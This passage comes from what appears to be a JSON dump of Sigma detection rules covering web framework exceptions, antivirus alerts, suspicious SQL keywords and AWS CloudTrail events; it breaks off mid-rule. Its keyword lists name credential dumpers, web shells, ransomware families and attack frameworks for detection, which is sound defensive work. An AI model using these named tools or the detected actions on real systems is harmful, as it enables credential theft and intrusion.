    "content": "title: Ruby on Rails Framework Exceptions\nid: 0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a\nstatus: stable\ndescription: Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts\nreferences:\n    - http://edgeguides.rubyonrails.org/security.html\n    - http://guides.rubyonrails.org/action_controller_overview.html\n    - https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception\n    - https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb\nauthor: Thomas Patzke\ndate: 2017-08-06\nmodified: 2020-09-01\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: ruby_on_rails\ndetection:\n    keywords:\n        - ActionController::InvalidAuthenticityToken\n        - ActionController::InvalidCrossOriginRequest\n        - ActionController::MethodNotAllowed\n        - ActionController::BadRequest\n        - ActionController::ParameterMissing\n    condition: keywords\nfalsepositives:\n    - Application bugs\nlevel: medium\n"
  },
  {
    "path": "rules/application/spring/spring_application_exceptions.yml",
    "content": "title: Spring Framework Exceptions\nid: ae48ab93-45f7-4051-9dfe-5d30a3f78e33\nstatus: stable\ndescription: Detects suspicious Spring framework exceptions that could indicate exploitation attempts\nreferences:\n    - https://docs.spring.io/spring-security/site/docs/current/api/overview-tree.html\nauthor: Thomas Patzke\ndate: 2017-08-06\nmodified: 2020-09-01\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: spring\ndetection:\n    keywords:\n        - AccessDeniedException\n        - CsrfException\n        - InvalidCsrfTokenException\n        - MissingCsrfTokenException\n        - CookieTheftException\n        - InvalidCookieException\n        - RequestRejectedException\n    condition: keywords\nfalsepositives:\n    - Application bugs\nlevel: medium\n"
  },
  {
    "path": "rules/application/spring/spring_spel_injection.yml",
    "content": "title: Potential SpEL Injection In Spring Framework\nid: e9edd087-89d8-48c9-b0b4-5b9bb10896b8\nstatus: test\ndescription: Detects potential SpEL Injection exploitation, which may lead to RCE.\nreferences:\n    - https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection\n    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\nauthor: Moti Harmats\ndate: 2023-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: spring\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'\ndetection:\n    keywords:\n        - 'org.springframework.expression.ExpressionException'\n    condition: keywords\nfalsepositives:\n    - Application bugs\nlevel: high\n"
  },
  {
    "path": "rules/application/sql/app_sqlinjection_errors.yml",
    "content": "title: Suspicious SQL Error Messages\nid: 8a670c6d-7189-4b1c-8017-a417ca84a086\nstatus: test\ndescription: Detects SQL error messages that indicate probing for an injection attack\nreferences:\n    - http://www.sqlinjection.net/errors\nauthor: Bjoern Kimminich\ndate: 2017-11-27\nmodified: 2023-02-12\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: sql\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL ERROR and above)'\ndetection:\n    keywords:\n        # Oracle\n        - quoted string not properly terminated\n        # MySQL\n        - You have an error in your SQL syntax\n        # SQL Server\n        - Unclosed quotation mark\n        # SQLite\n        - 'near \"*\": syntax error'\n        - SELECTs to the left and right of UNION do not have the same number of result columns\n    condition: keywords\nfalsepositives:\n    - A syntax error in MySQL also occurs in non-dynamic (safe) queries if there is an empty in() clause, that may often be the case.\nlevel: high\n"
  },
  {
    "path": "rules/application/velocity/velocity_ssti_injection.yml",
    "content": "title: Potential Server Side Template Injection In Velocity\nid: 16c86189-b556-4ee8-b4c7-7e350a195a4f\nstatus: test\ndescription: Detects exceptions in velocity template renderer, this most likely happens due to dynamic rendering of user input and may lead to RCE.\nreferences:\n    - https://antgarsil.github.io/posts/velocity/\n    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs\nauthor: Moti Harmats\ndate: 2023-02-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: velocity\n    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'\ndetection:\n    keywords:\n        - 'ParseErrorException'\n        - 'VelocityException'\n        - 'TemplateInitException'\n    condition: keywords\nfalsepositives:\n    - Application bugs\n    - Missing .vm files\nlevel: high\n"
  },
  {
    "path": "rules/category/antivirus/av_exploiting.yml",
    "content": "title: Antivirus Exploitation Framework Detection\nid: 238527ad-3c2c-4e4f-a1f6-92fd63adb864\nstatus: stable\ndescription: |\n    Detects a highly relevant Antivirus alert that reports an exploitation framework.\n    This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\nreferences:\n    - https://www.nextron-systems.com/?s=antivirus\n    - https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797\n    - https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424\n    - https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466\nauthor: Florian Roth (Nextron Systems), Arnim Rupp\ndate: 2018-09-09\nmodified: 2024-11-02\ntags:\n    - attack.execution\n    - attack.t1203\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: antivirus\ndetection:\n    selection:\n        Signature|contains:\n            - 'Backdoor.Cobalt'\n            - 'Brutel'\n            - 'BruteR'\n            - 'CobaltStr'\n            - 'CobaltStrike'\n            - 'COBEACON'\n            - 'Cometer'\n            - 'Exploit.Script.CVE'\n            - 'IISExchgSpawnCMD'\n            - 'Metasploit'\n            - 'Meterpreter'\n            - 'MeteTool'\n            - 'Mpreter'\n            - 'MsfShell'\n            - 'PowerSploit'\n            - 'Razy'\n            - 'Rozena'\n            - 'Sbelt'\n            - 'Seatbelt'\n            - 'Sliver'\n            - 'Swrort'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/category/antivirus/av_hacktool.yml",
    "content": "title: Antivirus Hacktool Detection\nid: fa0c05b6-8ad3-468d-8231-c1cbccb64fba\nstatus: stable\ndescription: |\n    Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool.\n    This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\nreferences:\n    - https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/\n    - https://www.nextron-systems.com/?s=antivirus\nauthor: Florian Roth (Nextron Systems), Arnim Rupp\ndate: 2021-08-16\nmodified: 2024-11-02\ntags:\n    - attack.execution\n    - attack.t1204\nlogsource:\n    category: antivirus\ndetection:\n    selection:\n        - Signature|startswith:\n              - 'ATK/'  # Sophos\n              - 'Exploit.Script.CVE'\n              - 'HKTL'\n              - 'HTOOL'\n              - 'PWS.'\n              - 'PWSX'\n              - 'SecurityTool'\n              # - 'FRP.'\n        - Signature|contains:\n              - 'Adfind'\n              - 'Brutel'\n              - 'BruteR'\n              - 'Cobalt'\n              - 'COBEACON'\n              - 'Cometer'\n              - 'DumpCreds'\n              - 'FastReverseProxy'\n              - 'Hacktool'\n              - 'Havoc'\n              - 'Impacket'\n              - 'Keylogger'\n              - 'Koadic'\n              - 'Mimikatz'\n              - 'Nighthawk'\n              - 'PentestPowerShell'\n              - 'Potato'\n              - 'PowerSploit'\n              - 'PowerSSH'\n              - 'PshlSpy'\n              - 'PSWTool'\n              - 'PWCrack'\n              - 'PWDump'\n              - 'Rozena'\n              - 'Rusthound'\n              - 'Sbelt'\n              - 'Seatbelt'\n              - 'SecurityTool'\n              - 'SharpDump'\n              - 'SharpHound'\n              - 'Shellcode'\n              - 'Sliver'\n              - 'Snaffler'\n              - 'SOAPHound'\n              - 'Splinter'\n              - 'Swrort'\n              - 'TurtleLoader'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/category/antivirus/av_password_dumper.yml",
    "content": "title: Antivirus Password Dumper Detection\nid: 78cc2dd2-7d20-4d32-93ff-057084c38b93\nstatus: stable\ndescription: |\n    Detects a highly relevant Antivirus alert that reports a password dumper.\n    This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\nreferences:\n    - https://www.nextron-systems.com/?s=antivirus\n    - https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619\n    - https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448\nauthor: Florian Roth (Nextron Systems), Arnim Rupp\ndate: 2018-09-09\nmodified: 2024-11-02\ntags:\n    - attack.credential-access\n    - attack.t1003\n    - attack.t1558\n    - attack.t1003.001\n    - attack.t1003.002\nlogsource:\n    category: antivirus\ndetection:\n    selection:\n        - Signature|startswith: 'PWS'\n        - Signature|contains:\n              - 'Certify'\n              - 'DCSync'\n              - 'DumpCreds'\n              - 'DumpLsass'\n              - 'DumpPert'\n              - 'HTool/WCE'\n              - 'Kekeo'\n              - 'Lazagne'\n              - 'LsassDump'\n              - 'Mimikatz'\n              - 'MultiDump'\n              - 'Nanodump'\n              - 'NativeDump'\n              - 'Outflank'\n              - 'PShlSpy'\n              - 'PSWTool'\n              - 'PWCrack'\n              - 'PWDump'\n              - 'PWS.'\n              - 'PWSX'\n              - 'pypykatz'\n              - 'Rubeus'\n              - 'SafetyKatz'\n              - 'SecurityTool'\n              - 'SharpChrome'\n              - 'SharpDPAPI'\n              - 'SharpDump'\n              - 'SharpKatz'\n              - 'SharpS.' # Sharpsploit, e.g. 530ea2ff9049f5dfdfa0a2e9c27c2e3c0685eb6cbdf85370c20a7bfae49f592d\n              - 'ShpKatz'\n              - 'TrickDump'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/category/antivirus/av_ransomware.yml",
    "content": "title: Antivirus Ransomware Detection\nid: 4c6ca276-d4d0-4a8c-9e4c-d69832f8671f\nstatus: test\ndescription: |\n    Detects a highly relevant Antivirus alert that reports ransomware.\n    This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\nreferences:\n    - https://www.nextron-systems.com/?s=antivirus\n    - https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916\n    - https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7\n    - https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045\n    - https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d\n    - https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c\n    - https://www.virustotal.com/gui/file/6f0f20da34396166df352bf301b3c59ef42b0bc67f52af3d541b0161c47ede05\nauthor: Florian Roth (Nextron Systems), Arnim Rupp\ndate: 2022-05-12\nmodified: 2024-11-02\ntags:\n    - attack.t1486\n    - attack.impact\nlogsource:\n    category: antivirus\ndetection:\n    selection:\n        Signature|contains:\n            - 'BlackWorm'\n            - 'Chaos'\n            - 'Cobra'\n            - 'ContiCrypt'\n            - 'Crypter'\n            - 'CRYPTES'\n            - 'Cryptor'\n            - 'CylanCrypt'\n            - 'DelShad'\n            - 'Destructor'\n            - 'Filecoder'\n            - 'GandCrab'\n            - 'GrandCrab'\n            - 'Haperlock'\n            - 'Hiddentear'\n            - 'HydraCrypt'\n            - 'Krypt'\n            - 'Lockbit'\n            - 'Locker'\n            - 'Mallox'\n            - 'Phobos'\n            - 'Ransom'\n            - 'Ryuk'\n            - 'Ryzerlo'\n            - 'Stopcrypt'\n            - 'Tescrypt'\n            - 'TeslaCrypt'\n            - 'WannaCry'\n            - 'Xorist'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/category/antivirus/av_relevant_files.yml",
    "content": "title: Antivirus Relevant File Paths Alerts\nid: c9a88268-0047-4824-ba6e-4d81ce0b907c\nstatus: test\ndescription: |\n    Detects an Antivirus alert in a highly relevant file path or with a relevant file name.\n    This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\nreferences:\n    - https://www.nextron-systems.com/?s=antivirus\nauthor: Florian Roth (Nextron Systems), Arnim Rupp\ndate: 2018-09-09\nmodified: 2024-11-02\ntags:\n    - attack.resource-development\n    - attack.t1588\nlogsource:\n    category: antivirus\ndetection:\n    selection_path:\n        Filename|contains:\n            - ':\\PerfLogs\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Default\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\'\n            - '/www/'\n            # - '\\Client\\'\n            - '\\inetpub\\'\n            - '\\tsclient\\'\n            - 'apache'\n            - 'nginx'\n            - 'tomcat'\n            - 'weblogic'\n    selection_ext:\n        Filename|endswith:\n            - '.asax'\n            - '.ashx'\n            - '.asmx'\n            - '.asp'\n            - '.aspx'\n            - '.bat'\n            - '.cfm'\n            - '.cgi'\n            - '.chm'\n            - '.cmd'\n            - '.dat'\n            - '.ear'\n            - '.gif'\n            - '.hta'\n            - '.jpeg'\n            - '.jpg'\n            - '.jsp'\n            - '.jspx'\n            - '.lnk'\n            - '.msc'\n            - '.php'\n            - '.pl'\n            - '.png'\n            - '.ps1'\n            - '.psm1'\n            - '.py'\n            - '.pyc'\n            - '.rb'\n            - '.scf'\n            - '.sct'\n            - '.sh'\n            - '.svg'\n            - '.txt'\n            - '.vbe'\n            - '.vbs'\n            - '.war'\n            - '.wll'\n            - '.wsf'\n            - '.wsh'\n            - '.xll'\n            - '.xml'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/category/antivirus/av_webshell.yml",
    "content": "title: Antivirus Web Shell Detection\nid: fdf135a2-9241-4f96-a114-bb404948f736\nstatus: test\ndescription: |\n    Detects a highly relevant Antivirus alert that reports a web shell.\n    It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches.\n    This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.\nreferences:\n    - https://www.nextron-systems.com/?s=antivirus\n    - https://github.com/tennc/webshell\n    - https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection\n    - https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection\n    - https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection\n    - https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection\n    - https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection\n    - https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection\n    - https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection\n    - https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection\nauthor: Florian Roth (Nextron Systems), Arnim Rupp\ndate: 2018-09-09\nmodified: 2024-11-02\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    category: antivirus\ndetection:\n    selection:\n        - Signature|startswith:\n              - 'ASP.'\n              - 'IIS/BackDoor'\n              - 'JAVA/Backdoor'\n              - 'JSP.'\n              - 'Perl.'\n              - 'PHP.'\n              - 'Troj/ASP'\n              - 'Troj/JSP'\n              - 'Troj/PHP'\n              - 'VBS/Uxor' # looking for 'VBS/' would also find downloader's and droppers meant for desktops\n        - Signature|contains:\n              - 'ASP_' # looking for 'VBS_' would also find downloader's and droppers meant for desktops\n              - 'ASP:'\n              - 'ASP.Agent'\n              - 'ASP/'\n              # - 'ASP/Agent'\n              - 'Aspdoor'\n              - 'ASPXSpy'\n              - 'Backdoor.ASP'\n              - 'Backdoor.Java'\n              - 'Backdoor.JSP'\n              - 'Backdoor.PHP'\n              - 'Backdoor.VBS'\n              - 'Backdoor/ASP'\n              - 'Backdoor/Java'\n              - 'Backdoor/JSP'\n              - 'Backdoor/PHP'\n              - 'Backdoor/VBS'\n              - 'C99shell'\n              - 'Chopper'\n              - 'filebrowser'\n              - 'JSP_'\n              - 'JSP:'\n              - 'JSP.Agent'\n              - 'JSP/'\n              # - 'JSP/Agent'\n              - 'Perl:'\n              - 'Perl/'\n              - 'PHP_'\n              - 'PHP:'\n              - 'PHP.Agent'\n              - 'PHP/'\n              # - 'PHP/Agent'\n              - 'PHPShell'\n              - 'PShlSpy'\n              - 'SinoChoper'\n              - 'Trojan.ASP'\n              - 'Trojan.JSP'\n              - 'Trojan.PHP'\n              - 'Trojan.VBS'\n              - 'VBS.Agent'\n              - 'VBS/Agent'\n              - 'Webshell'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/category/database/db_anomalous_query.yml",
    "content": "title: Suspicious SQL Query\nid: d84c0ded-edd7-4123-80ed-348bb3ccc4d5\nstatus: test\ndescription: Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields\nauthor: '@juju4'\ndate: 2022-12-27\nreferences:\n    - https://github.com/sqlmapproject/sqlmap\ntags:\n    - attack.exfiltration\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1190\n    - attack.t1505.001\nlogsource:\n    category: database\n    definition: 'Requirements: Must be able to log the SQL queries'\ndetection:\n    keywords:\n        - 'drop'\n        - 'truncate'\n        - 'dump'\n        - 'select \\*'\n    condition: keywords\nfalsepositives:\n    - Inventory and monitoring activity\n    - Vulnerability scanners\n    - Legitimate applications\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_bucket_deleted.yml",
    "content": "title: AWS Bucket Deleted\nid: 39c9f26d-6e3b-4dbb-9c7a-4154b0281112\nstatus: experimental\ndescription: |\n    Detects the deletion of S3 buckets in AWS CloudTrail logs.\n    Monitoring the deletion of S3 buckets is critical for security and data integrity, as it may indicate potential data loss or unauthorized access attempts.\nreferences:\n    - https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucket.html\n    - https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/delete-bucket.html\nauthor: Ivan Saakov, Nasreddine Bencherchali\ndate: 2025-10-19\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_event_name:\n        eventName: 'DeleteBucket'\n    selection_status_success:\n        errorCode: 'Success'\n    selection_status_null:\n        errorCode: null\n    condition: selection_event_name and 1 of selection_status_*\nfalsepositives:\n    - During maintenance operations or testing, authorized administrators may delete S3 buckets as part of routine data management or cleanup activities.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_console_login_failed_authentication.yml",
    "content": "title: AWS ConsoleLogin Failed Authentication\nid: 6393e346-1977-46ef-8987-ad414a145fad\nstatus: experimental\ndescription: |\n    Detects failed AWS console login attempts due to authentication failures. Monitoring these events is crucial for identifying potential brute-force attacks or unauthorized access attempts to AWS accounts.\nreferences:\n    - https://naikordian.github.io/blog/posts/brute-force-aws-console/\n    - https://help.fortinet.com/fsiem/Public_Resource_Access/7_2_1/rules/PH_RULE_AWS_Management_Console_Brute_Force_of_Root_User_Identity.htm\n    - https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1110.001/aws_login_failure/aws_cloudtrail_events.json\nauthor: Ivan Saakov, Nasreddine Bencherchali\ndate: 2025-10-19\ntags:\n    - attack.credential-access\n    - attack.t1110\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventName: 'ConsoleLogin'\n        errorMessage: 'Failed authentication'\n    condition: selection\nfalsepositives:\n    - Legitimate failed login attempts by authorized users. Investigate the source of repeated failed login attempts.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_console_login_success_without_mfa.yml",
    "content": "title: AWS Successful Console Login Without MFA\nid: 77caf516-34e5-4df9-b4db-20744fea0a60\nstatus: experimental\ndescription: |\n    Detects successful AWS console logins that were performed without Multi-Factor Authentication (MFA).\n    This alert can be used to identify potential unauthorized access attempts, as logging in without MFA can indicate compromised credentials or misconfigured security settings.\nreferences:\n    - https://securitylabs.datadoghq.com/cloud-security-atlas/vulnerabilities/iam-user-without-mfa/\n    - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html\nauthor: Thuya@Hacktilizer, Ivan Saakov\ndate: 2025-10-18\nmodified: 2025-10-21\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078.004\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventName: 'ConsoleLogin'\n        additionalEventData.MFAUsed: 'NO'\n        responseElements.ConsoleLogin: 'Success'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_disable_logging.yml",
    "content": "title: AWS CloudTrail Important Change\nid: 4db60cc0-36fb-42b7-9b58-a5b53019fb74\nstatus: test\ndescription: Detects disabling, deleting and updating of a Trail\nreferences:\n    - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html\nauthor: vitaliy0x1\ndate: 2020-01-21\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.008\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_source:\n        eventSource: cloudtrail.amazonaws.com\n        eventName:\n            - StopLogging\n            - UpdateTrail\n            - DeleteTrail\n    condition: selection_source\nfalsepositives:\n    - Valid change in a Trail\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_guardduty_detector_deleted_or_updated.yml",
    "content": "title: AWS GuardDuty Detector Deleted Or Updated\nid: d2656e78-c069-4571-8220-9e0ab5913f19\nstatus: experimental\ndescription: |\n    Detects successful deletion or disabling of an AWS GuardDuty detector, possibly by an attacker trying to avoid detection of its malicious activities.\n    Upon deletion, GuardDuty stops monitoring the environment and all existing findings are lost.\n    Verify with the user identity that this activity is legitimate.\nreferences:\n    - https://docs.aws.amazon.com/guardduty/latest/APIReference/API_DeleteDetector.html\n    - https://docs.aws.amazon.com/guardduty/latest/APIReference/API_UpdateDetector.html\n    - https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_suspend-disable.html\n    - https://docs.datadoghq.com/security/default_rules/719-39f-9cd/\n    - https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-guardduty-detector-is-enabled\n    - https://docs.stellarcyber.ai/5.2.x/Using/ML/Alert-Rule-Based-Potentially_Malicious_AWS_Activity.html\n    - https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Amazon%20Web%20Services/Analytic%20Rules/AWS_GuardDutyDisabled.yaml\n    - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/defense_evasion_guardduty_detector_deletion.toml\n    - https://help.fortinet.com/fsiem/Public_Resource_Access/7_4_0/rules/PH_RULE_AWS_GuardDuty_Detector_Deletion.htm\n    - https://research.splunk.com/sources/5d8bd475-c8bc-4447-b27f-efa508728b90/\n    - https://suktech24.com/2025/07/17/aws-threat-detection-rule-guardduty-detector-disabled-or-suspended/\n    - https://www.atomicredteam.io/atomic-red-team/atomics/T156001#atomic-test-46---aws---guardduty-suspension-or-deletion\nauthor: suktech24\ndate: 2025-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.t1562.008\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_event_source:\n        eventSource: 'guardduty.amazonaws.com'\n    selection_action_delete:\n        eventName: 'DeleteDetector'\n    selection_action_update:\n        eventName: 'UpdateDetector'\n        requestParameters.enable: 'false'\n    selection_status_success:\n        errorCode: 'Success'\n    selection_status_null:\n        errorCode: null\n    condition: selection_event_source and 1 of selection_action_* and 1 of selection_status_*\nfalsepositives:\n    - Legitimate detector deletion by an admin (e.g., during account decommissioning).\n    - Temporary disablement for troubleshooting (verify via change management tickets).\n    - Automated deployment tools (e.g. Terraform) managing GuardDuty state.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_imds_malicious_usage.yml",
    "content": "title: Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure\nid: 352a918a-34d8-4882-8470-44830c507aa3\nstatus: test\ndescription: |\n    Detects when an instance identity has taken an action that isn't inside SSM.\n    This can indicate that a compromised EC2 instance is being used as a pivot point.\nreferences:\n    - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-identity-roles.html\n    - https://ermetic.com/blog/aws/aws-ec2-imds-what-you-need-to-know/\n    - https://www.packetmischief.ca/2023/07/31/amazon-ec2-credential-exfiltration-how-it-happens-and-how-to-mitigate-it/#lifting-credentials-from-imds-this-is-why-we-cant-have-nice-things\nauthor: jamesc-grafana\ndate: 2024-07-11\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.t1078\n    - attack.t1078.002\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        userIdentity.arn|re: '.+:assumed-role/aws:.+'\n    filter_main_generic:\n        - eventSource: 'ssm.amazonaws.com'\n        - eventName: 'RegisterManagedInstance'\n        - sourceIPAddress: 'AWS Internal'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - A team has configured an EC2 instance to use instance profiles that grant the option for the EC2 instance to talk to other AWS Services\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_new_acl_entries.yml",
    "content": "title: New Network ACL Entry Added\nid: e1f7febb-7b94-4234-b5c6-00fb8500f5dd\nstatus: test\ndescription: |\n    Detects that network ACL entries have been added to a route table which could indicate that new attack vectors have been opened up in the AWS account.\nreferences:\n    - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/\nauthor: jamesc-grafana\ndate: 2024-07-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.007\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'ec2.amazonaws.com'\n        eventName: 'CreateNetworkAclEntry'\n    condition: selection\nfalsepositives:\n    - Legitimate use of ACLs to enable customer and staff access from the public internet into a public VPC\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_new_route_added.yml",
    "content": "title: New Network Route Added\nid: c803b2ce-c4a2-4836-beae-b112010390b1\nstatus: test\ndescription: |\n    Detects the addition of a new network route to a route table in AWS.\nreferences:\n    - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/\nauthor: jamesc-grafana\ndate: 2024-07-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.007\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'ec2.amazonaws.com'\n        eventName: 'CreateRoute'\n    condition: selection\nfalsepositives:\n    - New VPC Creation requiring setup of a new route table\n    - New subnets added requiring routing setup\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_pua_trufflehog.yml",
    "content": "title: PUA - AWS TruffleHog Execution\nid: a840e606-7c8c-4684-9bc1-eb6b6155127f\nstatus: experimental\ndescription: |\n    Detects the execution of TruffleHog, a popular open-source tool used for scanning repositories for secrets and sensitive information, within an AWS environment.\n    It has been reported to be used by threat actors for credential harvesting. All detections should be investigated to determine if the usage is authorized by security teams or potentially malicious.\nreferences:\n    - https://github.com/trufflesecurity/trufflehog\n    - https://www.rapid7.com/blog/post/tr-crimson-collective-a-new-threat-group-observed-operating-in-the-cloud/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-21\ntags:\n    - attack.credential-access\n    - attack.t1555\n    - attack.t1003\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        userAgent: 'TruffleHog'\n    condition: selection\nfalsepositives:\n    - Legitimate use of TruffleHog by security teams for credential scanning.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_region_enabled.yml",
    "content": "title: AWS EnableRegion Command Monitoring\nid: a5ffb6ea-c784-4e01-b30a-deb6e58ca2ab\nstatus: experimental\ndescription: |\n    Detects the use of the EnableRegion command in AWS CloudTrail logs.\n    While AWS has 30+ regions, some of them are enabled by default, others must be explicitly enabled in each account separately.\n    There may be situations where security monitoring does not cover some new AWS regions.\n    Monitoring the EnableRegion command is important for identifying potential persistence mechanisms employed by adversaries, as enabling additional regions can facilitate continued access and operations within an AWS environment.\nreferences:\n    - https://docs.aws.amazon.com/accounts/latest/reference/API_EnableRegion.html\n    - https://awscli.amazonaws.com/v2/documentation/api/2.14.0/reference/account/enable-region.html\nauthor: Ivan Saakov, Sergey Zelenskiy\ndate: 2025-10-19\ntags:\n    - attack.persistence\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventName: 'EnableRegion'\n        eventSource: 'account.amazonaws.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the EnableRegion command by authorized 